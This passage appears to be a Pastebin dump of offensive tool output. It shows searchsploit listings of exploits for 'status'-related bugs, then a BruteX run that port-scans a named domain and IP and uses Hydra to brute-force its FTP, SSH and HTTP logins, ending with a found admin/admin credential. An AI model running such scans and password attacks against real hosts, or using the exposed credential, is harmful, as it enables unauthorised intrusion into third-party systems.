  3115. Microsoft Internet Explorer 6 - HTML Form St | windows/remote/23903.html
  3116. Microsoft Internet Explorer 6 - IFRAME Statu | windows/remote/24720.txt
  3117. Microsoft Internet Explorer 6 - TABLE Status | windows/remote/24712.txt
  3118. Microsoft WININET.dll - CHttp­Header­Parse | windows/dos/40747.html
  3119. Mozilla Firefox 3.0.5 - Status Bar Obfuscati | windows/remote/7842.html
  3120. Mozilla Suite/Firefox/Thunderbird - Nested A | linux/remote/25221.txt
  3121. MyBB MyStatus 3.1 - SQL Injection            | php/webapps/17972.txt
  3122. Nagios 3.0.6 - 'statuswml.cgi' Arbitrary She | cgi/remote/33051.txt
  3123. Nagios3 - statuswml.cgi Command Injection (M | unix/webapps/9861.rb
  3124. Nagios3 - statuswml.cgi Ping Command Executi | cgi/webapps/16908.rb
  3125. Novell NetMail 3.52d - IMAP STATUS Buffer Ov | windows/remote/16483.rb
  3126. Opera 10.10 - Status Bar Obfuscation         | multiple/dos/10870.html
  3127. Opera Web Browser 8.0/8.5 - HTML Form Status | multiple/remote/26531.html
  3128. OrangeHRM 2.7 RC - plugins/ajaxCalls/haltRes | php/webapps/37143.txt
  3129. Pligg CMS 1.1.2 - 'status' Parameter SQL Inj | php/webapps/36495.txt
  3130. PlutoStatus Locator 1.0pre alpha - 'index.ph | php/webapps/31202.txt
  3131. Post Affiliate Pro 3 - 'umprof_status' Param | php/webapps/7238.txt
  3132. Status2k - Remote Add Admin                  | php/webapps/11258.html
  3133. Status2k Server Monitoring Software - Multip | php/webapps/34239.txt
  3134. StatusNet/Laconica 0.7.4/0.8.2/0.9.0beta3 -  | php/webapps/28956.txt
  3135. WhatsApp Status Changer 0.2 - Exploit        | php/webapps/18396.sh
  3136. Yahoo! Messenger 5.x/6.0 - Offline Mode Stat | windows/remote/25196.txt
  3137. iScripts AutoHoster - 'checktransferstatus.p | php/webapps/38885.txt
  3138. iScripts AutoHoster - 'checktransferstatusbc | php/webapps/38886.txt
  3139. osCMax 2.5 - admin/stats_monthly_sales.php s | php/webapps/37042.txt
  3140. osCMax 2.5 - admin/stats_monthly_sales.php s | php/webapps/37048.txt
  3141. osCommerce 2.2 - 'admin/orders_status.php' ' | php/webapps/28750.txt
  3142. osTicket - tickets.php status Parameter Cros | php/webapps/38162.txt
  3143. pfSense - status_graph.php if Parameter Cros | hardware/remote/35070.txt
  3144. phpMyAdmin 2.11.1 - Server_Status.php Cross- | php/webapps/30733.txt
  3145. xtell 2.6.1 - User Status Remote Information | linux/remote/21310.txt
  3146. --------------------------------------------- ----------------------------------
  3147. --------------------------------------------- ----------------------------------
  3148.  Exploit Title                               |  Path
  3149.                                              | (/usr/share/exploitdb/platforms/)
  3150. --------------------------------------------- ----------------------------------
  3151. Apple Safari 1.2 Web Browser - TABLE Status  | osx/remote/24716.txt
  3152. Apple Safari Web Browser 1.x - HTML Form Sta | osx/dos/24843.txt
  3153. Dell SonicWALL Scrutinizer 9.0.1 - 'statusFi | php/webapps/20033.py
  3154. Dicshunary 0.1a - 'check_status.php' Remote  | php/webapps/2808.txt
  3155. Google Chrome 3.0195.38 - Status Bar Obfusca | windows/dos/10879.html
  3156. HP Network Node Manager (NMM) i 9.10 - nnm/p | jsp/webapps/36356.txt
  3157. Ipswitch IMail 5.0.8/6.0/6.1 - IMonitor stat | windows/dos/19711.txt
  3158. MailEnable IMAPD 1.54 - STATUS Request Buffe | windows/remote/16485.rb
  3159. Microsoft Internet Explorer 5.0.1 - Mouse Ev | windows/remote/25095.txt
  3160. Microsoft WININET.dll - CHttp­Header­Parse | windows/dos/40747.html
  3161. MyBB MyStatus 3.1 - SQL Injection            | php/webapps/17972.txt
  3162. Opera 10.10 - Status Bar Obfuscation         | multiple/dos/10870.html
  3163. Pligg CMS 1.1.2 - 'status' Parameter SQL Inj | php/webapps/36495.txt
  3164. PlutoStatus Locator 1.0pre alpha - 'index.ph | php/webapps/31202.txt
  3165. phpMyAdmin 2.11.1 - Server_Status.php Cross- | php/webapps/30733.txt
  3166. xtell 2.6.1 - User Status Remote Information | linux/remote/21310.txt
  3167. --------------------------------------------- ----------------------------------
  3168.  + -- ----------------------------=[Running Brute Force]=--------------------- -- +
  3169.  __________                __         ____  ___
  3170.  \______   \_______ __ ___/  |_  ____ \   \/  /
  3171.   |    |  _/\_  __ \  |  \   __\/ __ \ \     / 
  3172.   |    |   \ |  | \/  |  /|  | \  ___/ /     \ 
  3173.   |______  / |__|  |____/ |__|  \___  >___/\  \ 
  3174.          \/                         \/      \_/
  3175.  
  3176.  + -- --=[BruteX v1.7 by 1N3
  3177.  + -- --=[http://crowdshield.com
  3178. ################################### Running Port Scan ##############################
  3179.  
  3180. Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-16 21:02 EDT
  3181. Nmap scan report for tinymodel-sugar.info (94.102.49.48)
  3182. Host is up (0.18s latency).
  3183. Other addresses for tinymodel-sugar.info (not scanned): 94.102.49.50
  3184. Not shown: 20 closed ports, 3 filtered ports
  3185. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  3186. PORT   STATE SERVICE
  3187. 21/tcp open  ftp
  3188. 22/tcp open  ssh
  3189. 80/tcp open  http
  3190.  
  3191. Nmap done: 1 IP address (1 host up) scanned in 2.16 seconds
  3192.  
  3193. ################################### Running Brute Force ############################
  3194.  
  3195.  + -- --=[Port 21 opened... running tests...
  3196. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  3197.  
  3198. Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-16 21:02:35
  3199. [DATA] max 1 task per 1 server, overall 1 tasks, 30 login tries, ~30 tries per task
  3200. [DATA] attacking ftp://tinymodel-sugar.info:21/
  3201. [STATUS] 21.00 tries/min, 21 tries in 00:01h, 9 to do in 00:01h, 1 active
  3202. 1 of 1 target completed, 0 valid passwords found
  3203. Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-16 21:03:35
  3204.  + -- --=[Port 22 opened... running tests...
  3205. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  3206.  
  3207. Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-16 21:03:35
  3208. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
  3209. [DATA] attacking ssh://tinymodel-sugar.info:22/
  3210. [STATUS] 16.00 tries/min, 16 tries in 00:01h, 1480 to do in 01:33h, 1 active
  3211. [STATUS] 13.67 tries/min, 41 tries in 00:03h, 1455 to do in 01:47h, 1 active
  3212. [STATUS] 14.86 tries/min, 104 tries in 00:07h, 1392 to do in 01:34h, 1 active
  3213. [STATUS] 14.42 tries/min, 173 tries in 00:12h, 1323 to do in 01:32h, 1 active
  3214. [STATUS] 14.00 tries/min, 238 tries in 00:17h, 1258 to do in 01:30h, 1 active
  3215. [STATUS] 14.27 tries/min, 314 tries in 00:22h, 1182 to do in 01:23h, 1 active
  3216. [STATUS] 14.19 tries/min, 383 tries in 00:27h, 1113 to do in 01:19h, 1 active
  3217. [STATUS] 14.25 tries/min, 456 tries in 00:32h, 1040 to do in 01:13h, 1 active
  3218. [STATUS] 14.30 tries/min, 529 tries in 00:37h, 967 to do in 01:08h, 1 active
  3219. [STATUS] 14.26 tries/min, 599 tries in 00:42h, 897 to do in 01:03h, 1 active
  3220. [STATUS] 14.36 tries/min, 675 tries in 00:47h, 821 to do in 00:58h, 1 active
  3221. [STATUS] 14.33 tries/min, 745 tries in 00:52h, 751 to do in 00:53h, 1 active
  3222. [STATUS] 14.39 tries/min, 820 tries in 00:57h, 676 to do in 00:47h, 1 active
  3223. [STATUS] 14.42 tries/min, 894 tries in 01:02h, 602 to do in 00:42h, 1 active
  3224. [STATUS] 14.40 tries/min, 965 tries in 01:07h, 531 to do in 00:37h, 1 active
  3225. [STATUS] 14.07 tries/min, 1013 tries in 01:12h, 483 to do in 00:35h, 1 active
  3226. [STATUS] 14.05 tries/min, 1082 tries in 01:17h, 414 to do in 00:30h, 1 active
  3227. [STATUS] 14.10 tries/min, 1156 tries in 01:22h, 340 to do in 00:25h, 1 active
  3228. [STATUS] 14.13 tries/min, 1229 tries in 01:27h, 267 to do in 00:19h, 1 active
  3229. [STATUS] 14.15 tries/min, 1302 tries in 01:32h, 194 to do in 00:14h, 1 active
  3230. [STATUS] 14.18 tries/min, 1375 tries in 01:37h, 121 to do in 00:09h, 1 active
  3231. [STATUS] 14.18 tries/min, 1390 tries in 01:38h, 106 to do in 00:08h, 1 active
  3232. [STATUS] 14.18 tries/min, 1404 tries in 01:39h, 92 to do in 00:07h, 1 active
  3233. [STATUS] 14.19 tries/min, 1419 tries in 01:40h, 77 to do in 00:06h, 1 active
  3234. [STATUS] 14.20 tries/min, 1434 tries in 01:41h, 62 to do in 00:05h, 1 active
  3235. [STATUS] 14.21 tries/min, 1449 tries in 01:42h, 47 to do in 00:04h, 1 active
  3236. [STATUS] 14.20 tries/min, 1463 tries in 01:43h, 33 to do in 00:03h, 1 active
  3237. [STATUS] 14.21 tries/min, 1478 tries in 01:44h, 18 to do in 00:02h, 1 active
  3238. [STATUS] 14.21 tries/min, 1492 tries in 01:45h, 4 to do in 00:01h, 1 active
  3239. 1 of 1 target completed, 0 valid passwords found
  3240. Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-16 22:48:57
  3241.  + -- --=[Port 23 closed... skipping.
  3242.  + -- --=[Port 25 closed... skipping.
  3243.  + -- --=[Port 80 opened... running tests...
  3244. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  3245.  
  3246. Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-16 22:48:57
  3247. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
  3248. [DATA] attacking http-get://tinymodel-sugar.info:80//
  3249. [80][http-get] host: tinymodel-sugar.info   login: admin   password: admin
  3250. [STATUS] attack finished for tinymodel-sugar.info (valid pair found)
  3251. 1 of 1 target successfully completed, 1 valid password found
  3252. Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-16 22:48:58
  3253.  + -- --=[Port 110 closed... skipping.
  3254.  + -- --=[Port 139 closed... skipping.
  3255.  + -- --=[Port 162 closed... skipping.
  3256.  + -- --=[Port 389 closed... skipping.
  3257.  + -- --=[Port 443 closed... skipping.
  3258.  + -- --=[Port 445 closed... skipping.
  3259.  + -- --=[Port 512 closed... skipping.
  3260.  + -- --=[Port 513 closed... skipping.
  3261.  + -- --=[Port 514 closed... skipping.
  3262.  + -- --=[Port 993 closed... skipping.
  3263.  + -- --=[Port 1433 closed... skipping.
  3264.  + -- --=[Port 1521 closed... skipping.
  3265.  + -- --=[Port 3306 closed... skipping.
  3266.  + -- --=[Port 3389 closed... skipping.
  3267.  + -- --=[Port 5432 closed... skipping.
  3268.  + -- --=[Port 5900 closed... skipping.
  3269.  + -- --=[Port 5901 closed... skipping.
  3270.  + -- --=[Port 8000 closed... skipping.
  3271.  + -- --=[Port 8080 closed... skipping.
  3272.  + -- --=[Port 8100 closed... skipping.
  3273.  + -- --=[Port 6667 closed... skipping.
  3274.  
  3275. ######################################################################################################################################
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top